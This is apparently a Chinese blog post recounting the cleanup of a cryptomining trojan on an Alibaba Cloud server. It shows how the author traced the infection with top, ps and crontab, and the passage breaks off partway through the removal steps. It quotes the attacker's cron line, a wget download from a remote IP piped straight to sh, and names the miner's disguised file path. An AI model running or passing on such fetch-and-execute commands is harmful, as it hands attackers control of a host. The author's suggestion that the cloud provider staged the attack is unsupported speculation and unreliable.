先用ssh登录到云服务器看看再说。使用“top -c”命令看一下哪个进程占用的cpu和memory最高,发现也没有啊,看来这个挖矿进程没有工作呢!接着再用“ps -ef”看一下有哪些进程。结果让我吓一跳,出现很多下面的:
原来是在计划任务中,执行了“/bin/sh -c wget -q http://192.99.142.235:8220/logo4.jpg -O - | sh”
这一行命令什么意思呢?它就是把执行脚本伪装成网站上的jpg图片,使用wget下载到本地(注意不是保存为文件),看“-O -”,这表示直接给到打印输出,通过管道给sh执行!这相当于在云服务器主机上可以为所欲为了。再看这个ip,查询出来竟是“IP地址: 192.99.142.235 加拿大魁北克 OVH”,似乎是来自境外的攻击。所幸的是,这台主机无法访问资源“http://192.99.142.235:8220/logo4.jpg”,所以没有造成安全问题。
之前也遇到过这个问题,令我感到奇怪的是,我在其他云上的主机就没有这个问题呢。我甚至有点怀疑这是阿里云故意搞的诡计,意图就是花钱买它提供的附加的安全服务。像这种命令是怎么执行的?外部如何能够入侵一台云服务器主机?真的不得而知,而且哦,就能被你阿里云检测到了,我购买了你的服务器,你都不能保证我的云服务器安全,这算什么呢?阿里云实际上是用一个叫作AliYunDun的进程来监控云主机的,百度云也有类似的,不过叫做hosteye。
好了,下面谈谈怎么清除这个木马吧!用到crontab -l和crontab -e这两个命令,分别是查看和编辑任务调度的。先crontab -e把调度的那一行给删了,保存。再用“kill 进程id”把可疑进程杀掉。
由于telnet是明文传输,服务端的telnet千万别打开,切记!
下面步入正题,查看阿里云后台的告警提示得知,该挖矿进程的文件位于/etc/sysconfig/cpuid/cpuid,它为了隐蔽自己,把名字改成了cpuid,嘿嘿!于是直接删除它呗!还没那么容易,竟然删不掉!
用chmod也不行,后来参考这篇文章